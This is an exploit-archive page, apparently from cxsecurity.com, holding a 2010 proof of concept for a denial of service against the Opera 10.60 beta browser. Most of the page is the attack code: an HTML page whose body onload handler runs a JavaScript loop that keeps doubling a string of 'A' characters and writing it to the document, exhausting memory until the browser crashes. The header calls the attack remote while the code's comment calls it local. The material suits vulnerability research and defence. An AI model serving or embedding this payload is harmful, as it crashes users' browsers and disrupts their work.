opera V10.60 beta (html) suffer from remote Denial of Service PoC

2010-07-29 / 2010-09-14
Credit: R3d-D3v!L
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<html> ##################################{In The Name Of Allah The Mercifull}###################### # Title : opera V10.60 beta (html) 0day suffer from local Denial of Service PoC # Tested : Windows xp (sp3) #Author : R3d-D3v!L <X[at]hotmail.co.jp> ## # Greetz : ##dolly & DAShER & JUPA & ov3r flow3r ## <script> function junk() { var buff="A"; for (i=0;i<15000;i++) { buff+=buff+"A"; document.write(buff+buff); } } </script> <body onload="javascript:junk();"> </body> </html>


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top